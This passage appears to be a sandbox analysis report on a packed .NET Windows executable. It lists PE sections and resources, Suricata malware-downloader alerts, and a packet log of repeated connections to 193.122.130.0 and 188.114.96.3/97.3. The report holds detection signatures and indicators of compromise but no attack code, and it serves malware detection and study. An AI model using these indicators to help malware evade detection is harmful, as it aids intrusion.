                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x20000xab5200xab600a1e0ddb0cb65a62c6691914364370a29False0.957757795404814data7.952098121903517IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0xae0000x17940x18008edeef6c6ad3b86beac5a0e1f89c6841False0.3896484375data5.71864779722505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0xb00000xc0x20061abefaeef45b71b47b992a51c176f33False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0xae1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.37406191369606
                                                                                                                                                        RT_GROUP_ICON0xaf1d80x14data1.1
                                                                                                                                                        RT_VERSION0xaf1ec0x3bcdata0.4131799163179916
                                                                                                                                                        RT_MANIFEST0xaf5a80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                        Network Behavior

                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-11-20T07:52:12.696787+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.130.080TCP
                                                                                                                                                        2024-11-20T07:52:13.697027+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.130.080TCP
                                                                                                                                                        2024-11-20T07:52:14.228878+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737188.114.97.3443TCP
                                                                                                                                                        2024-11-20T07:52:15.024961+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.130.080TCP
                                                                                                                                                        2024-11-20T07:52:15.513508+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739188.114.97.3443TCP
                                                                                                                                                        2024-11-20T07:52:18.243695+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741193.122.130.080TCP
                                                                                                                                                        2024-11-20T07:52:19.462372+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741193.122.130.080TCP
                                                                                                                                                        2024-11-20T07:52:19.513508+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745188.114.97.3443TCP
                                                                                                                                                        2024-11-20T07:52:20.075811+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.97.3443TCP
                                                                                                                                                        2024-11-20T07:52:20.634261+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449749193.122.130.080TCP
                                                                                                                                                        2024-11-20T07:52:21.872740+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449752188.114.96.3443TCP
                                                                                                                                                        2024-11-20T07:52:23.778611+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449759188.114.96.3443TCP
                                                                                                                                                        2024-11-20T07:52:24.029099+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449760188.114.96.3443TCP
                                                                                                                                                        2024-11-20T07:52:26.148930+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449765188.114.96.3443TCP
                                                                                                                                                        2024-11-20T07:52:27.582198+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461283188.114.96.3443TCP

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Nov 20, 2024 07:52:10.318958998 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:10.323846102 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:10.324405909 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:10.325648069 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:10.330590010 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:11.369198084 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:11.440049887 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:11.445100069 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:12.561940908 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:12.680752993 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:12.680804014 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:12.680893898 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:12.696787119 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:12.721900940 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:12.721936941 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.184176922 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.184319973 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.205862999 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.205887079 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.206190109 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.334290028 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.375328064 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.440099955 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.440171957 CET44349735188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.440507889 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.479331970 CET49735443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.499758959 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:13.505085945 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.604727030 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.607877016 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.607903957 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.609716892 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.610183001 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:13.610192060 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:13.697026968 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:14.096833944 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.098707914 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:14.098737001 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.228902102 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.228962898 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.229619026 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:14.229923010 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:14.233418941 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:14.234529018 CET4973880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:14.238662958 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.239507914 CET8049738193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.239626884 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:14.239670038 CET4973880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:14.239823103 CET4973880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:14.244858980 CET8049738193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.940684080 CET8049738193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.941998959 CET49739443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:14.942035913 CET44349739188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:14.942095995 CET49739443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:14.942348003 CET49739443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:14.942362070 CET44349739188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:15.024960995 CET4973880192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:15.397756100 CET44349739188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:15.399653912 CET49739443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:15.399677992 CET44349739188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:15.513544083 CET44349739188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:15.513638020 CET44349739188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:15.513778925 CET49739443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:15.514215946 CET49739443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:15.519593000 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:15.524590015 CET8049740193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:15.524708986 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:15.524806023 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:15.529684067 CET8049740193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:16.598887920 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:16.604011059 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:16.604114056 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:16.604588032 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:16.609596014 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:16.666760921 CET8049740193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:16.668525934 CET49742443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:16.668631077 CET44349742188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:16.668724060 CET49742443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:16.669045925 CET49742443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:16.669080973 CET44349742188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:16.727998018 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.129633904 CET44349742188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.131735086 CET49742443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:17.131776094 CET44349742188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.142674923 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.151498079 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.156394958 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.280802011 CET44349742188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.280865908 CET44349742188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.280956984 CET49742443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:17.281397104 CET49742443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:17.288774014 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.289474964 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.297240019 CET8049743193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.297246933 CET8049740193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:17.297326088 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.297353029 CET4974080192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.297436953 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:17.302252054 CET8049743193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.188131094 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.230266094 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.230313063 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.230465889 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.234922886 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.234936953 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.243695021 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:18.696857929 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.696980000 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.699285030 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.699295998 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.699640036 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.743712902 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.846545935 CET8049743193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.899869919 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:18.945431948 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.945512056 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:18.945642948 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.946315050 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:18.946345091 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.189605951 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.235330105 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.299958944 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.300029993 CET44349744188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.300193071 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.304037094 CET49744443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.308557987 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.313532114 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.398497105 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.400697947 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.400765896 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.414479971 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.417197943 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.417260885 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.417437077 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.417769909 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.417799950 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.462372065 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.513514042 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.513581038 CET44349745188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.513699055 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.514292002 CET49745443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.518639088 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.519917965 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.523821115 CET8049743193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.523962975 CET4974380192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.524764061 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.524863958 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.524987936 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:19.529803991 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.920553923 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:19.922390938 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:19.922439098 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.009561062 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.018743992 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.018791914 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.018857956 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.019155979 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.019171000 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.056193113 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.075828075 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.075896025 CET44349746188.114.97.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.076116085 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:20.076463938 CET49746443192.168.2.4188.114.97.3
                                                                                                                                                        Nov 20, 2024 07:52:20.080478907 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.081752062 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.085773945 CET8049741193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.085839033 CET4974180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.086711884 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.086822987 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.086951971 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.092398882 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.489943981 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.491785049 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.491822004 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.587681055 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.589453936 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.589504004 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.589570999 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.589952946 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.589963913 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.620990992 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.621140003 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.621205091 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.621777058 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:20.625353098 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.626733065 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.630686998 CET8049747193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.630763054 CET4974780192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.631772041 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:20.631932020 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.632050991 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.634260893 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:20.637120962 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.094069004 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.134260893 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.168705940 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.168732882 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.240581036 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.241926908 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.241975069 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.242046118 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.242321968 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.242356062 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.284296989 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.284358025 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.284425974 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.284936905 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.290508986 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.300534010 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.305381060 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.305478096 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.305669069 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.310518980 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.722657919 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.757750988 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.757781029 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.872848988 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.873034954 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.873128891 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.875493050 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:21.893385887 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.894094944 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.898513079 CET8049751193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.898585081 CET4975180192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.898973942 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:21.899059057 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.899164915 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:21.904015064 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.158598900 CET8049754193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.160501957 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.160567045 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.160695076 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.161106110 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.161123037 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.212373018 CET4975480192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.388186932 CET8049755193.122.130.0192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.389473915 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.389523983 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.389657021 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.389938116 CET49760443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.389955044 CET44349760188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.431340933 CET4975580192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.636738062 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.646564960 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.646646023 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.778620958 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.778686047 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                        Nov 20, 2024 07:52:23.778948069 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.779361010 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                        Nov 20, 2024 07:52:23.783706903 CET4976280192.168.2.4193.122.130.0
                                                                                                                                                        Nov 20, 2024 07:52:23.783992052 CET4975480192.168.2.4193.122.130.0
